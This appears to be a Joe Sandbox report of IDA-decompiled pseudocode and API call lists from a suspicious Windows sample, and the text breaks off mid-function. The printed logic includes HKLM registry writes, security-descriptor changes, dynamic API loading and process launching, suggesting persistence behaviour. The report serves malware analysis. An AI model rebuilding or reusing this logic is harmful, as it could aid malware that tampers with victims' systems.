						__eflags = E003D0AD0(_t413 - 0x5c0,  *((intOrPtr*)( *(_t413 - 0x5b8) + 0x14)));
						if(__eflags == 0) {
							goto L12;
						}
						E003C5700( *((intOrPtr*)(_t413 - 0x5bc)), __eflags);
						 *0x3e85ac = _t298;
						 *(_t413 - 0x30) = _t298;
						 *(_t413 - 0x2c) = _t298;
						 *(_t413 - 0x14) = _t298;
						 *(_t413 - 0x10) = _t298;
						 *(_t413 - 0x3c) = _t298;
						 *(_t413 - 0x38) = _t298;
						 *(_t413 - 0x44) = _t298;
						 *(_t413 - 0x40) = _t298;
						 *((intOrPtr*)( *( *0x3e8628)))(_t298, _t298, E003E08A0, _t413 - 0x5c0, _t298, _t413 - 0x74);
						 *(_t413 - 0x24) = _t298;
						while(1) {
							_t218 =  *(_t413 - 0x5b8);
							_t325 = 0;
							 *0x3e857c = 0;
							 *(_t413 - 0x20) = _t298;
							__eflags =  *((intOrPtr*)(_t218 + 0x18)) - _t298;
							if(__eflags <= 0) {
								goto L79;
							}
							do {
								_t384 =  *( *((intOrPtr*)(_t218 + 0x20)) + _t325 * 4);
								_t224 = L003C94D0(_t413 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t218 + 0x1c)) + _t325 * 4)), _t384);
								__eflags = _t224;
								if(_t224 != 0) {
									__imp___time64(_t298);
									_t408 = _t384;
									_t385 =  *0x3e857c; // 0x0
									_t421 = _t416 + 4;
									_t410 = _t224;
									_t225 = _t224 -  *((intOrPtr*)( *((intOrPtr*)( *(_t413 - 0x5b8) + 0x24)) + _t385 * 8));
									__eflags = _t225;
									asm("sbb ebx, [ecx+edx*8+0x4]");
									 *(_t413 - 0x48) = _t408;
									if(__eflags < 0) {
										L27:
										_t298 = 0;
										_t227 = E003D1B80(_t410, _t413 - 0xc, _t413 - 0x5c0, _t413 - 0x28);
										_t416 = _t421 + 0xc;
										__eflags = _t227;
										if(_t227 == 0) {
											 *(_t413 - 0x20) =  *(_t413 - 0x20) + 1;
											 *( *((intOrPtr*)(_t413 - 0x5bc)) + 0xc) =  *(_t413 - 0x28);
											_t230 = _t410 -  *(_t413 - 0x3c);
											__eflags = _t230;
											asm("sbb edx, [ebp-0x38]");
											 *(_t413 - 0x48) = _t408;
											if(__eflags < 0) {
												L36:
												E003C42A0(__eflags, _t413 - 0x5c0);
												_t422 = _t416 + 4;
												_t232 = E003D12C0();
												_push(4);
												__eflags = _t232 - _t298;
												if(__eflags >= 0) {
													if(__eflags != 0) {
														_push(_t413 - 0x9c0);
														E003C9090(__eflags);
														E003C9090(__eflags, _t413 - 0xdc0, 7);
														_push(_t413 - 0xdc0);
														_push(_t413 - 0x9c0);
														_push(0xe);
														_t390 = _t413 - 0x5c0;
														_push(_t390);
													} else {
														_push(_t413 - 0x9c0);
														E003C9090(__eflags);
														E003C9090(__eflags, _t413 - 0xdc0, 6);
														_push(_t413 - 0xdc0);
														_t390 = _t413 - 0x9c0;
														_push(_t390);
														_push(0xe);
														_push(_t413 - 0x5c0);
													}
												} else {
													_push(_t413 - 0x9c0);
													E003C9090(__eflags);
													E003C9090(__eflags, _t413 - 0xdc0, 5);
													_t390 = _t413 - 0xdc0;
													_push(_t390);
													_push(_t413 - 0x9c0);
													_push(0xe);
													_push(_t413 - 0x5c0);
												}
												_t236 = E003C5A10();
												_t423 = _t422 + 0x20;
												 *(_t413 - 0x48) = _t298;
												do {
													__imp___time64(0);
													_t410 = _t236;
													_t237 =  *0x3e8570; // 0x0
													_t416 = _t423 + 4;
													_t408 = _t390;
													__eflags = _t237 - 2;
													if(_t237 == 2) {
														L46:
														_t239 = E003C36E0(_t408, _t410, _t413 - 0xc, _t413 - 0x5c0,  *(_t413 - 0x14),  *(_t413 - 0x10));
														_t416 = _t416 + 0x10;
														asm("sbb edx, 0x0");
														 *(_t413 - 0x14) = _t410 - 0x708;
														 *(_t413 - 0x10) = _t408;
														__eflags = _t239 - 1;
														if(_t239 == 1) {
															 *0x3e85ac = _t239;
														}
														L48:
														_t241 = _t410 -  *(_t413 - 0x44);
														__eflags = _t241;
														asm("sbb ecx, [ebp-0x40]");
														 *(_t413 - 0x5c) = _t408;
														if(__eflags < 0) {
															L55:
															_t410 = _t410 -  *(_t413 - 0x30);
															__eflags = _t410;
															asm("sbb edi, [ebp-0x2c]");
															 *(_t413 - 0x5c) = _t408;
															if(__eflags < 0) {
																L62:
																_t242 = E003C9890( *((intOrPtr*)(_t413 - 0x5bc)));
																__eflags = _t242;
																if(_t242 == 0) {
																	L77:
																	_t298 = 0;
																	__eflags = 0;
																	goto L78;
																}
																_push(1);
																_push(_t413 - 0x5c0);
																_t243 = E003C5A10();
																_t416 = _t416 + 8;
																__eflags = _t243;
																if(__eflags == 0) {
																	goto L77;
																}
																_t390 = _t413 - 0x5c0;
																_t244 = E003C7560(_t298, __eflags, _t390);
																_t416 = _t416 + 4;
																__eflags = _t244;
																if(_t244 == 0) {
																	__eflags =  *0x3e85ac;
																	if( *0x3e85ac != 0) {
																		L82:
																		E003C1700(_t413 - 0xc);
																		E003CF850(_t298, _t413 - 0x5c0);
																		E003CC930(_t413 - 4);
																		_t298 = 0;
																		__eflags = 0;
																		goto L83;
																	}
																	goto L77;
																}
																__eflags =  *0x3e85ac;
																if( *0x3e85ac != 0) {
																	goto L82;
																}
																_t248 =  *0x3e8584; // 0x0
																_t410 = 0xa;
																__eflags = _t248;
																if(_t248 == 0) {
																	_t249 =  *(_t413 - 0x24);
																	__eflags = _t249;
																	if(_t249 <= 0) {
																		while(1) {
																			L70:
																			_t346 =  *0x3e8584; // 0x0
																			__eflags = _t346;
																			if(_t346 != 0) {
																				goto L72;
																			}
																			_t390 =  *0x3e8628; // 0x622508
																			 *((intOrPtr*)( *((intOrPtr*)(_t390 + 0xc8))))(0x4e20);
																			_t410 = _t410 - 1;
																			__eflags = _t410;
																			if(_t410 > 0) {
																				continue;
																			}
																			goto L72;
																		}
																		goto L72;
																	}
																	L69:
																	_t253 = _t249 - 1;
																	__eflags = _t253;
																	 *(_t413 - 0x24) = _t253;
																	_t410 = 1;
																	goto L70;
																}
																_t141 = _t410 - 5; // 0x5
																_t249 = _t141;
																 *0x3e8584 = 0;
																goto L69;
															}
															if(__eflags > 0) {
																L58:
																_t410 = E003CF2D0(_t413 - 0x5c0);
																_t255 = E003C99A0(_t298, _t413 - 0x19, _t408, _t254, _t254);
																_push(8);
																__eflags = _t255;
																if(__eflags == 0) {
																	_push(_t413 - 0x9c0);
																	E003C9090(__eflags);
																	E003C9090(__eflags, _t413 - 0xdc0, 0xa);
																	_push(_t413 - 0xdc0);
																	_t396 = _t413 - 0x9c0;
																	_push(_t396);
																	_push(0xe);
																	_push(_t413 - 0x5c0);
																} else {
																	_push(_t413 - 0x9c0);
																	E003C9090(__eflags);
																	E003C9090(__eflags, _t413 - 0xdc0, 9);
																	_t396 = _t413 - 0xdc0;
																	_push(_t396);
																	_push(_t413 - 0x9c0);
																	_push(0xe);
																	_push(_t413 - 0x5c0);
																}
																E003C5A10();
																_t261 = E003CBB40(_t410);
																__imp___time64(0);
																_t416 = _t416 + 0x28;
																 *(_t413 - 0x30) = _t261;
																 *(_t413 - 0x2c) = _t396;
																goto L62;
															}
															__eflags = _t410 - 0x7080;
															if(_t410 <= 0x7080) {
																goto L62;
															}
															goto L58;
														}
														if(__eflags > 0) {
															L51:
															_t398 =  *0x3e857c; // 0x0
															_t267 = _t410 -  *((intOrPtr*)( *((intOrPtr*)( *(_t413 - 0x5b8) + 0x28)) + _t398 * 8));
															__eflags = _t267;
															_t298 = _t408;
															asm("sbb ebx, [ecx+edx*8+0x4]");
															 *(_t413 - 0x5c) = _t408;
															if(__eflags < 0) {
																goto L55;
															}
															if(__eflags > 0) {
																L54:
																 *(_t413 - 0x44) = _t410;
																 *(_t413 - 0x40) = _t408;
																_t269 = E003C1FE0(_t298, _t408, _t410, _t413 - 0xc, _t413 - 0x5c0, _t413 - 0x5b8);
																_t416 = _t416 + 0xc;
																__eflags = _t269;
																if(_t269 != 0) {
																	_t270 = E003D0AD0(_t413 - 0x5c0,  *((intOrPtr*)( *(_t413 - 0x5b8) + 0x14)));
																	__eflags = _t270;
																	if(_t270 == 0) {
																		goto L82;
																	}
																	 *0x3e857c = 0;
																	goto L77;
																}
																goto L55;
															}
															__eflags = _t267 - 0x3840;
															if(_t267 <= 0x3840) {
																goto L55;
															}
															goto L54;
														}
														__eflags = _t241 - 0x4b0;
														if(_t241 <= 0x4b0) {
															goto L55;
														}
														goto L51;
													}
													_t272 = _t410 -  *(_t413 - 0x14);
													__eflags = _t272;
													asm("sbb ecx, [ebp-0x10]");
													 *(_t413 - 0x5c) = _t408;
													if(__eflags < 0) {
														goto L48;
													}
													if(__eflags > 0) {
														goto L46;
													}
													__eflags = _t272 - 0xe10;
													if(_t272 <= 0xe10) {
														goto L48;
													}
													goto L46;
													L72:
													_t236 =  *(_t413 - 0x48) + 1;
													 *(_t413 - 0x48) = _t236;
													__eflags = _t236 - 0x64;
												} while (_t236 < 0x64);
												goto L77;
											}
											if(__eflags > 0) {
												L34:
												_t282 = E003CAC90( *(_t413 - 0x5b8), _t413 - 0x5c0);
												_t416 = _t416 + 8;
												__eflags = _t282;
												if(__eflags == 0) {
													goto L78;
												}
												 *(_t413 - 0x3c) = _t410;
												 *(_t413 - 0x38) = _t408;
												goto L36;
											}
											__eflags = _t230 - 0xe10;
											if(__eflags <= 0) {
												goto L36;
											}
											goto L34;
										}
										__eflags = _t227 - 1;
										if(_t227 != 1) {
											E003CC870(_t413 - 0x5c0, _t227);
											_t416 = _t416 + 8;
										}
										_t361 =  *0x3e8628; // 0x622508
										 *((intOrPtr*)( *((intOrPtr*)(_t361 + 0xc8))))(0x3e8);
										goto L78;
									}
									if(__eflags > 0) {
										L22:
										_t287 = E003CD890(_t410, __eflags, _t413 - 0xc, _t413 - 0x5c0, _t413 - 0x58);
										_t421 = _t421 + 0xc;
										__eflags = _t287;
										if(_t287 == 0) {
											_t288 =  *((intOrPtr*)( *(_t413 - 0x5b8) + 0x24));
											_t363 =  *0x3e857c; // 0x0
											 *(_t288 + _t363 * 8) = _t410;
											_t405 =  *0x3e857c; // 0x0
											 *(_t288 + 4 + _t405 * 8) = _t408;
											goto L27;
										}
										__eflags = _t287 - 1;
										if(_t287 != 1) {
											E003CC870(_t413 - 0x5c0, _t287);
											_t416 = _t421 + 8;
										}
										_t289 =  *0x3e8628; // 0x622508
										 *((intOrPtr*)( *((intOrPtr*)(_t289 + 0xc8))))(0x3e8);
										goto L77;
									}
									__eflags = _t225 - 0x3840;
									if(__eflags <= 0) {
										goto L27;
									}
									goto L22;
								}
								_t407 =  *0x3e8628; // 0x622508
								 *((intOrPtr*)( *((intOrPtr*)(_t407 + 0xc8))))(0x3e8);
								L78:
								_t341 =  *0x3e857c; // 0x0
								_t218 =  *(_t413 - 0x5b8);
								_t325 = _t341 + 1;
								 *0x3e857c = _t325;
								__eflags = _t325 -  *((intOrPtr*)(_t218 + 0x18));
							} while (__eflags < 0);
							L79:
							_t220 = E003E0A40(_t408, _t410, __eflags, _t413 - 0xc, _t413 - 0x5b8);
							_t416 = _t416 + 8;
							__eflags = _t220;
							if(_t220 == 0) {
								__eflags =  *(_t413 - 0x20) - _t298;
								if(__eflags == 0) {
									L003E0D30(_t298, _t408, _t410, __eflags, _t413 - 0xc, _t413 - 0x5c0);
									_t416 = _t416 + 8;
								}
							}
						}
					} else {
						L12:
						E003C1700(_t413 - 0xc);
						E003CF850(_t298, _t413 - 0x5c0);
						E003CC930(_t413 - 4);
						goto L83;
					}
				} else {
					E003CC930(_t413 - 4);
					L83:
					_t427 =  *0x3e85ac - _t298; // 0x0
					if(_t427 == 0) {
						L96:
						E003C9480();
						E003C7E10();
						ExitProcess(_t298);
					}
					_t374 =  *0x3e8628; // 0x622508
					_t411 = 0;
					 *((intOrPtr*)(_t413 - 0x70)) = 0;
					 *((intOrPtr*)(_t413 - 0x6c)) = 0;
					 *((intOrPtr*)(_t413 - 0x68)) = 0;
					 *((intOrPtr*)(_t413 - 0x64)) = 0;
					 *(_t413 - 0x18) = 0;
					 *((intOrPtr*)(_t413 - 0xb8)) = 0x44;
					 *((intOrPtr*)( *((intOrPtr*)(_t374 + 0xb8))))(_t413 - 0xb8);
					E003C8030(_t413 - 0x18);
					_t204 = E003D1D90(0x20a, 0);
					_t299 = _t204;
					if(_t299 == 0) {
						L95:
						_t376 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t376 + 0xd8))))( *(_t413 - 0x18), _t411, _t411, _t411, _t411, _t411, _t411, _t299, _t413 - 0xb8, _t413 - 0x70);
						_t377 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t377 + 0xf8))))( *((intOrPtr*)(_t413 - 0x70)));
						_t378 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t378 + 0xf8))))( *((intOrPtr*)(_t413 - 0x6c)));
						E003CBB40( *(_t413 - 0x18));
						_t298 = 0;
						goto L96;
					}
					_t379 =  *(_t413 - 0x18);
					_t412 = 0x104;
					_t409 = 0;
					while(1) {
						_t170 = _t412 + 0x7ffffefa; // 0x7ffffffe
						if(_t170 == 0) {
							break;
						}
						_t322 =  *_t379 & 0x0000ffff;
						if(_t322 == 0) {
							break;
						}
						 *_t204 = _t322;
						_t204 =  &(_t204[0]);
						_t379 =  &(_t379[1]);
						_t412 = _t412 - 1;
						if(_t412 != 0) {
							continue;
						}
						L91:
						_t204 = _t204 - 2;
						_t409 = 0x8007007a;
						L92:
						 *_t204 = 0;
						if(_t409 >= 0) {
							_t213 =  *0x3e8628; // 0x622508
							 *((intOrPtr*)( *((intOrPtr*)(_t213 + 0x1e8))))(_t299);
						}
						_t411 = 0;
						goto L95;
					}
					__eflags = _t412;
					if(_t412 != 0) {
						goto L92;
					}
					goto L91;
				}
			}





































































    0x003cfd20
    0x003cfd25
    0x003cfd28
    0x003cfd2d
    0x003cfd2f
    0x003cfd34
    0x003cfd39
    0x003cfd3e
    0x003cfd4b
    0x003cfd4b
    0x003cfd40
    0x003cfd47
    0x003cfd47
    0x003cfd4f
    0x003cfd56
    0x003cfd65
    0x003cfd67
    0x003cfd6b
    0x003cfd70
    0x003cfd71
    0x003cfd76
    0x003cfd76
    0x003cfd79
    0x003cfd7f
    0x003cfd8a
    0x003cfd90
    0x003cfd96
    0x003cfda7
    0x003cfdaf
    0x003cfdb7
    0x003cfdbc
    0x003cfdbe
    0x003cfdc1
    0x003cfdc4
    0x003cfdc9
    0x003cfdcc
    0x003cfdce
    0x003cfddf
    0x003cfdd0
    0x003cfdd7
    0x003cfdd7
    0x003cfdee
    0x003cfe05
    0x003cfe18
    0x003cfe28
    0x003cfe2d
    0x003cfe30
    0x003cfe32
    0x003cfe5d
    0x003cfe72
    0x003cfe74
    0x00000000
    0x00000000
    0x003cfe7c
    0x003cfe99
    0x003cfea2
    0x003cfea5
    0x003cfea8
    0x003cfeab
    0x003cfeae
    0x003cfeb1
    0x003cfeb4
    0x003cfeb7
    0x003cfeba
    0x003cfebc
    0x003cfec0
    0x003cfec0
    0x003cfec6
    0x003cfec8
    0x003cfece
    0x003cfed1
    0x003cfed4
    0x00000000
    0x00000000
    0x003cfee0
    0x003cfee3
    0x003cfef4
    0x003cfef9
    0x003cfefb
    0x003cff16
    0x003cff25
    0x003cff27
    0x003cff2d
    0x003cff30
    0x003cff32
    0x003cff32
    0x003cff37
    0x003cff3b
    0x003cff3e
    0x003cffac
    0x003cffbb
    0x003cffbd
    0x003cffc2
    0x003cffc5
    0x003cffc7
    0x003cffff
    0x003d0002
    0x003d0007
    0x003d0007
    0x003d000c
    0x003d000f
    0x003d0012
    0x003d0041
    0x003d0048
    0x003d004d
    0x003d0053
    0x003d0058
    0x003d005a
    0x003d005c
    0x003d0091
    0x003d00cc
    0x003d00cd
    0x003d00db
    0x003d00e6
    0x003d00ed
    0x003d00ee
    0x003d00f0
    0x003d00f6
    0x003d0093
    0x003d0099
    0x003d009a
    0x003d00a8
    0x003d00b3
    0x003d00b4
    0x003d00ba
    0x003d00bb
    0x003d00c3
    0x003d00c3
    0x003d005e
    0x003d0064
    0x003d0065
    0x003d0073
    0x003d0078
    0x003d007e
    0x003d0085
    0x003d0086
    0x003d008e
    0x003d008e
    0x003d00f7
    0x003d00fc
    0x003d00ff
    0x003d0102
    0x003d0104
    0x003d010a
    0x003d010c
    0x003d0111
    0x003d0114
    0x003d0116
    0x003d0119
    0x003d0133
    0x003d0146
    0x003d014b
    0x003d0158
    0x003d015b
    0x003d015e
    0x003d0161
    0x003d0164
    0x003d0166
    0x003d0166
    0x003d016b
    0x003d016d
    0x003d016d
    0x003d0172
    0x003d0175
    0x003d0178
    0x003d01d3
    0x003d01d3
    0x003d01d3
    0x003d01d6
    0x003d01d9
    0x003d01dc
    0x003d028f
    0x003d0295
    0x003d029a
    0x003d029c
    0x003d0372
    0x003d0372
    0x003d0372
    0x00000000
    0x003d0372
    0x003d02a8
    0x003d02aa
    0x003d02ab
    0x003d02b0
    0x003d02b3
    0x003d02b5
    0x00000000
    0x00000000
    0x003d02bb
    0x003d02c2
    0x003d02c7
    0x003d02ca
    0x003d02cc
    0x003d0369
    0x003d0370
    0x003d03cc
    0x003d03cf
    0x003d03da
    0x003d03e2
    0x003d03e7
    0x003d03e7
    0x00000000
    0x003d03e7
    0x00000000
    0x003d0370
    0x003d02d2
    0x003d02d9
    0x00000000
    0x00000000
    0x003d02df
    0x003d02e4
    0x003d02e9
    0x003d02eb
    0x003d02fc
    0x003d02ff
    0x003d0301
    0x003d0310
    0x003d0310
    0x003d0310
    0x003d0316
    0x003d0318
    0x00000000
    0x00000000
    0x003d031a
    0x003d032b
    0x003d032d
    0x003d032e
    0x003d0330
    0x00000000
    0x00000000
    0x00000000
    0x003d0330
    0x00000000
    0x003d0310
    0x003d0303
    0x003d0303
    0x003d0303
    0x003d0304
    0x003d0307
    0x00000000
    0x003d0307
    0x003d02ed
    0x003d02ed
    0x003d02f0
    0x00000000
    0x003d02f0
    0x003d01e2
    0x003d01f0
    0x003d01fb
    0x003d0201
    0x003d0206
    0x003d0208
    0x003d020a
    0x003d0245
    0x003d0246
    0x003d0254
    0x003d025f
    0x003d0260
    0x003d0266
    0x003d0267
    0x003d026f
    0x003d020c
    0x003d0212
    0x003d0213
    0x003d0221
    0x003d0226
    0x003d022c
    0x003d0233
    0x003d0234
    0x003d023c
    0x003d023c
    0x003d0270
    0x003d0279
    0x003d0280
    0x003d0286
    0x003d0289
    0x003d028c
    0x00000000
    0x003d028c
    0x003d01e4
    0x003d01ea
    0x00000000
    0x00000000
    0x00000000
    0x003d01ea
    0x003d017a
    0x003d0183
    0x003d018c
    0x003d0194
    0x003d0194
    0x003d0197
    0x003d0199
    0x003d019d
    0x003d01a0
    0x00000000
    0x00000000
    0x003d01a2
    0x003d01ab
    0x003d01bd
    0x003d01c0
    0x003d01c3
    0x003d01c8
    0x003d01cb
    0x003d01cd
    0x003d0354
    0x003d0359
    0x003d035b
    0x00000000
    0x00000000
    0x003d035d
    0x00000000
    0x003d035d
    0x00000000
    0x003d01cd
    0x003d01a4
    0x003d01a9
    0x00000000
    0x00000000
    0x00000000
    0x003d01a9
    0x003d017c
    0x003d0181
    0x00000000
    0x00000000
    0x00000000
    0x003d0181
    0x003d011d
    0x003d011d
    0x003d0122
    0x003d0125
    0x003d0128
    0x00000000
    0x00000000
    0x003d012a
    0x00000000
    0x00000000
    0x003d012c
    0x003d0131
    0x00000000
    0x00000000
    0x00000000
    0x003d0332
    0x003d0335
    0x003d0336
    0x003d0339
    0x003d0339
    0x00000000
    0x003d0342
    0x003d0014
    0x003d001d
    0x003d002b
    0x003d0030
    0x003d0033
    0x003d0035
    0x00000000
    0x00000000
    0x003d003b
    0x003d003e
    0x00000000
    0x003d003e
    0x003d0016
    0x003d001b
    0x00000000
    0x00000000
    0x00000000
    0x003d001b
    0x003cffc9
    0x003cffcc
    0x003cffd6
    0x003cffdb
    0x003cffdb
    0x003cffde
    0x003cffef
    0x00000000
    0x003cffef
    0x003cff40
    0x003cff49
    0x003cff58
    0x003cff5d
    0x003cff60
    0x003cff62
    0x003cff96
    0x003cff99
    0x003cff9f
    0x003cffa2
    0x003cffa8
    0x00000000
    0x003cffa8
    0x003cff64
    0x003cff67
    0x003cff71
    0x003cff76
    0x003cff76
    0x003cff79
    0x003cff89
    0x00000000
    0x003cff89
    0x003cff42
    0x003cff47
    0x00000000
    0x00000000
    0x00000000
    0x003cff47
    0x003cfefd
    0x003cff0e
    0x003d0374
    0x003d0374
    0x003d037a
    0x003d0380
    0x003d0381
    0x003d0387
    0x003d0387
    0x003d0390
    0x003d039b
    0x003d03a0
    0x003d03a3
    0x003d03a5
    0x003d03ab
    0x003d03ae
    0x003d03bf
    0x003d03c4
    0x003d03c4
    0x003d03ae
    0x003d03a5
    0x003cfe34
    0x003cfe34
    0x003cfe37
    0x003cfe42
    0x003cfe4a
    0x00000000
    0x003cfe4a
    0x003cfd58
    0x003cfd5b
    0x003d03e9
    0x003d03e9
    0x003d03ef
    0x003d04eb
    0x003d04eb
    0x003d04f0
    0x003d04f6
    0x003d04f6
    0x003d03f5
    0x003d03fb
    0x003d0403
    0x003d0406
    0x003d0409
    0x003d040c
    0x003d040f
    0x003d0412
    0x003d0423
    0x003d0429
    0x003d0434
    0x003d0439
    0x003d0440
    0x003d0495
    0x003d049c
    0x003d04b7
    0x003d04bc
    0x003d04c9
    0x003d04ce
    0x003d04db
    0x003d04e1
    0x003d04e9
    0x00000000
    0x003d04e9
    0x003d0442
    0x003d0445
    0x003d044a
    0x003d0450
    0x003d0450
    0x003d0458
    0x00000000
    0x00000000
    0x003d045a
    0x003d0460
    0x00000000
    0x00000000
    0x003d0462
    0x003d0465
    0x003d0468
    0x003d046b
    0x003d046c
    0x00000000
    0x00000000
    0x003d0474
    0x003d0474
    0x003d0477
    0x003d047c
    0x003d047e
    0x003d0483
    0x003d0485
    0x003d0491
    0x003d0491
    0x003d0493
    0x00000000
    0x003d0493
    0x003d0470
    0x003d0472
    0x00000000
    0x00000000
    0x00000000
    0x003d0472

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003CFD34
      • Part of subcall function 003CE850: CoCreateInstance.OLE32(003E638C,00000000,00000001,003E617C,?), ref: 003CE8A7
      • Part of subcall function 003C3D50: VariantInit.OLEAUT32(?), ref: 003C6306
      • Part of subcall function 003C3D50: VariantInit.OLEAUT32(?), ref: 003C631E
      • Part of subcall function 003C3D50: VariantClear.OLEAUT32(?), ref: 003C642C
      • Part of subcall function 003C3D50: VariantClear.OLEAUT32(?), ref: 003C6432
      • Part of subcall function 003C3D50: VariantClear.OLEAUT32(?), ref: 003C6438
      • Part of subcall function 003C3D50: VariantInit.OLEAUT32(?), ref: 003C6479
      • Part of subcall function 003C3D50: VariantInit.OLEAUT32(?), ref: 003C6497
      • Part of subcall function 003C3D50: VariantInit.OLEAUT32(?), ref: 003C64B8
      • Part of subcall function 003C3D50: VariantClear.OLEAUT32(?), ref: 003C658F
      • Part of subcall function 003C3D50: VariantClear.OLEAUT32(?), ref: 003C6598
      • Part of subcall function 003C3D50: VariantClear.OLEAUT32(?), ref: 003C659E
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
      • Part of subcall function 003C9480: FreeLibrary.KERNELBASE(00000000,003D04F0), ref: 003C94B1
    • ExitProcess.KERNEL32 ref: 003D04F6
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003E0790, Relevance: 5.1, APIs: 4, Instructions: 55

    Control-flow Graph

    C-Code - Quality: 100%
    			E003E0790(short* __edi, char __esi, void* __eflags) {
				void _v516;
				void* __ebx;
				void* _t18;
				void* _t19;
				void* _t29;

				_t29 = __eflags;
				memset( &_v516, 0, 0x200);
				E003C9090(_t29,  &_v516, 0xc8);
				_t19 =  &_v516;
				E003E0640(_t19, __edi, __esi); // executed
				memset(_t19, 0, 0x200);
				E003C9090(_t29, _t19, 0xc9);
				_t12 =  &((StrStrW(_t19, 0x3e32c4))[1]);
				E003CF630(0x80000002,  &((StrStrW(_t19, 0x3e32c4))[1])); // executed
				E003E0640(_t19, __edi, __esi); // executed
				memset(_t19, 0, 0x200);
				E003C9090(_t12, _t19, 0xca);
				_t18 = E003E0640(_t19, __edi, __esi); // executed
				return _t18;
			}








    0x003e0790
    0x003e07a8
    0x003e07b9
    0x003e07c0
    0x003e07c6
    0x003e07d5
    0x003e07e2
    0x003e07f8
    0x003e0801
    0x003e0808
    0x003e0817
    0x003e0824
    0x003e082b
    0x003e0837

    APIs
    • memset.MSVCRT ref: 003E07A8
      • Part of subcall function 003E0640: StrChrW.SHLWAPI(?,0000005C), ref: 003E0673
      • Part of subcall function 003E0640: RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 003E0688
      • Part of subcall function 003E0640: GetSecurityInfo.ADVAPI32(?,00000004,00000004,00000000,00000000,00000000,00000000,00000000), ref: 003E06AD
      • Part of subcall function 003E0640: StrChrW.SHLWAPI(?,0000005C), ref: 003E06D6
      • Part of subcall function 003E0640: RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 003E06F1
      • Part of subcall function 003E0640: RegSetValueExW.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 003E0716
      • Part of subcall function 003E0640: SetNamedSecurityInfoW.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000), ref: 003E0732
    • memset.MSVCRT ref: 003E07D5
    • StrStrW.SHLWAPI(?,003E32C4), ref: 003E07F2
      • Part of subcall function 003CF630: memset.MSVCRT ref: 003CF660
      • Part of subcall function 003CF630: memcpy.MSVCRT ref: 003CF66B
    • memset.MSVCRT ref: 003E0817
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CD616, Relevance: 4.6, APIs: 3, Instructions: 70
    C-Code - Quality: 58%
    			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				int* _t31;
				int _t32;
				int _t34;
				signed int _t41;
				signed int _t44;
				signed int _t47;
				long _t57;
				signed int _t59;
				void* _t61;
				intOrPtr _t69;

				E003C7131();
				_push(0x5c);
				_push(0x3e6b40);
				E003E27E4(__ebx, __edi, __esi);
				 *(_t61 - 0x1c) = 0;
				 *((intOrPtr*)(_t61 - 4)) = 0;
				GetStartupInfoW(_t61 - 0x6c);
				 *((intOrPtr*)(_t61 - 4)) = 0xfffffffe;
				 *((intOrPtr*)(_t61 - 4)) = 1;
				_t57 =  *( *[fs:0x18] + 4);
				 *((intOrPtr*)(_t61 - 0x20)) = 0;
				while(1) {
					_t27 = InterlockedCompareExchange(0x3e8c3c, _t57, 0);
					if(_t27 == 0) {
						break;
					}
					if(_t27 != _t57) {
						Sleep(0x3e8);
						continue;
					} else {
						_t59 = 1;
						 *((intOrPtr*)(_t61 - 0x20)) = 1;
					}
					L7:
					_t28 =  *0x3e8c38; // 0x2
					if(_t28 != _t59) {
						_t29 =  *0x3e8c38; // 0x2
						__eflags = _t29;
						if(__eflags != 0) {
							 *0x3e865c = _t59;
							goto L14;
						} else {
							 *0x3e8c38 = _t59;
							_t41 = E003D1B59(0x3e3240, 0x3e324c); // executed
							__eflags = _t41;
							if(__eflags == 0) {
								goto L14;
							} else {
								goto L40;
							}
						}
					} else {
						_push(0x1f);
						L003CF19C();
						L14:
						_t30 =  *0x3e8c38; // 0x2
						if(_t30 == _t59) {
							_push(0x3e323c);
							_push(0x3e3234); // executed
							L003C27A8(); // executed
							 *0x3e8c38 = 2;
						}
						if( *((intOrPtr*)(_t61 - 0x20)) == 0) {
							InterlockedExchange(0x3e8c3c, 0);
						}
						_t69 =  *0x3e8c40; // 0x0
						if(_t69 != 0) {
							_push(0x3e8c40);
							if(E003C3D60(0, 0x3e8c3c, _t59, _t69) != 0) {
								 *0x3e8c40(0, 2, 0);
							}
						}
						_t31 = __imp___wcmdln;
